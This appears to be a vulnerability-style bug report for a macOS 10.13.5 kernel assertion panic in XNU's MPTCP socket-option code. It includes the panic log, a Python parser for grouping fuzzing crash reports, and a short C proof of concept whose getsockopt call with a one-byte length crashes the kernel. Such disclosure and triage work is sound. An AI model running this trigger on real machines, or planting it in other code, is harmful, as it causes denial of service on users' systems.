Description

This case is an assertion failure (a kernel VERIFY that panics the machine). Apple no longer accepts this type of case as a vulnerability.

Environment

  • OS: macOS 10.13.5
  • Module: BSD

Panic Report

panic(cpu 0 caller 0xffffff8003df2892): assertion failed: mpo == NULL || sopt->sopt_valsize == sizeof (int), file: /Users/xxxxxxxx/Vuln/myxnu/build-xnu-4570.41.2/xnu-4570.41.2/bsd/netinet/mptcp_subr.c, line: 1113
Backtrace (CPU 0), Frame : Return Address
0xffffff8866f23aa0 : 0xffffff8003943f26 
0xffffff8866f23af0 : 0xffffff8003abcdf4 
0xffffff8866f23b30 : 0xffffff8003aad0a9 
0xffffff8866f23bb0 : 0xffffff80038dc190 
0xffffff8866f23bd0 : 0xffffff80039435fa 
0xffffff8866f23d00 : 0xffffff800394339c 
0xffffff8866f23d60 : 0xffffff8003df2892 
0xffffff8866f23d90 : 0xffffff8003dfa5ef 
0xffffff8866f23e40 : 0xffffff8003f83815 
0xffffff8866f23eb0 : 0xffffff8003f91fc5 
0xffffff8866f23f10 : 0xffffff8003fc6a4b 
0xffffff8866f23fa0 : 0xffffff80038dc976 

BSD process name corresponding to current thread: syz-executor0
Boot args: kext-dev-mode=1 debug=0x146 kcsuffix=development

Mac OS version:
17D47
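
When many reports of this kind come out of a fuzzing run, the first triage step is to group them by the assertion that fired rather than by the raw addresses, which change with the kernel slide and the builder's local path. The parser below is an added example and is not part of the original report; it runs over a constructed copy of the panic header above (three of the twelve backtrace frames kept) and extracts the assertion expression, the tree-relative source location, the return addresses, the process name and the boot args, then builds a grouping key from file:line plus the expression. The path normalisation assumes the XNU source lives under a directory named xnu-<version>, as in the report.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: the panic header quoted in the report above, with three of
# the twelve backtrace frames kept so the example runs offline.
SAMPLE_REPORT = """\
panic(cpu 0 caller 0xffffff8003df2892): assertion failed: mpo == NULL || sopt->sopt_valsize == sizeof (int), file: /Users/xxxxxxxx/Vuln/myxnu/build-xnu-4570.41.2/xnu-4570.41.2/bsd/netinet/mptcp_subr.c, line: 1113
Backtrace (CPU 0), Frame : Return Address
0xffffff8866f23aa0 : 0xffffff8003943f26
0xffffff8866f23af0 : 0xffffff8003abcdf4
0xffffff8866f23d60 : 0xffffff8003df2892

BSD process name corresponding to current thread: syz-executor0
Boot args: kext-dev-mode=1 debug=0x146 kcsuffix=development
"""

PANIC_RE = re.compile(
    r"^panic\(cpu (?P<cpu>\d+) caller (?P<caller>0x[0-9a-f]+)\): "
    r"assertion failed: (?P<expr>.+?), file: (?P<file>\S+), line: (?P<line>\d+)\s*$"
)
FRAME_RE = re.compile(r"^(?P<frame>0x[0-9a-f]+) : (?P<ret>0x[0-9a-f]+)\s*$")
PROC_RE = re.compile(r"^BSD process name corresponding to current thread: (?P<proc>\S+)")
BOOT_RE = re.compile(r"^Boot args: (?P<args>.*)$")


@dataclass
class PanicInfo:
    cpu: int
    caller: str                 # address of the function that called panic()
    assertion: str              # the expression that failed
    source_file: str            # path exactly as printed (includes the builder's prefix)
    line: int
    return_addrs: List[str] = field(default_factory=list)
    process: str = ""
    boot_args: Dict[str, str] = field(default_factory=dict)

    def source_key(self) -> str:
        """file:line relative to the xnu-<version> tree, stable across build dirs."""
        m = re.search(r"/xnu-[\d.]+/(.+)$", self.source_file)
        rel = m.group(1) if m else self.source_file
        return f"{rel}:{self.line}"

    def caller_frame_index(self) -> Optional[int]:
        """Index of the backtrace frame whose return address is the panic caller."""
        try:
            return self.return_addrs.index(self.caller)
        except ValueError:
            return None


def parse_panic_report(text: str) -> PanicInfo:
    """Parse the header, backtrace, process and boot-args lines of a macOS panic."""
    info: Optional[PanicInfo] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = PANIC_RE.match(line)
        if m:
            info = PanicInfo(cpu=int(m["cpu"]), caller=m["caller"],
                             assertion=m["expr"], source_file=m["file"],
                             line=int(m["line"]))
            continue
        if info is None:
            continue                       # ignore anything before the panic line
        m = FRAME_RE.match(line)
        if m:
            info.return_addrs.append(m["ret"])
            continue
        m = PROC_RE.match(line)
        if m:
            info.process = m["proc"]
            continue
        m = BOOT_RE.match(line)
        if m:
            for kv in m["args"].split():   # "debug=0x146" -> ("debug", "0x146")
                key, _, value = kv.partition("=")
                info.boot_args[key] = value
    if info is None:
        raise ValueError("no 'panic(...): assertion failed' line found")
    return info


def dedup_key(info: PanicInfo) -> str:
    """Group repeated reports of one assertion regardless of slide or build path."""
    return f"{info.source_key()} {info.assertion}"


if __name__ == "__main__":
    p = parse_panic_report(SAMPLE_REPORT)
    print(dedup_key(p))
    print("process:", p.process, "| caller frame:", p.caller_frame_index(),
          "| kernel variant (kcsuffix):", p.boot_args.get("kcsuffix", "(default)"))
```

The caller address in the panic line reappears as a return address in the backtrace, so caller_frame_index() tells you which frame hit the VERIFY without symbolicating; the kcsuffix boot arg records which kernel variant (here the development kernel) produced the report, which matters when deciding whether a report reproduces on a stock install.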

PoC

#include <cstdio>
#include <cstdlib>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>

/* AF_MULTIPATH is not in the public SDK headers; 39 is its value in XNU. */
#define AF_MULTIPATH 39

int main(int argc, const char * argv[]) {
    /* MPTCP socket: TCP-level options are kept per session (the "mpo" records
       named in the failed assertion) rather than on a plain TCP socket. */
    int sockfd = socket(AF_MULTIPATH, SOCK_STREAM, IPPROTO_TCP);
    if (sockfd < 0) {
        perror("socket(AF_MULTIPATH)");
        return EXIT_FAILURE;
    }
    int flag = 0;
    socklen_t len = 1;      /* deliberately not sizeof(int) */

    /* Set the option with the correct size, then read it back with a 1-byte
       length; this is the input that hits the VERIFY in mptcp_subr.c. */
    setsockopt(sockfd, IPPROTO_TCP, TCP_NODELAY, (void *)&flag, sizeof(flag));
    getsockopt(sockfd, IPPROTO_TCP, TCP_NODELAY, (void *)&flag, &len);

    close(sockfd);
    return 0;
}

Disclaimer

Since this type of case is not a vulnerability, the vendor (Apple) may not fix it. Please don't use this PoC code for anything malicious. Just for fun.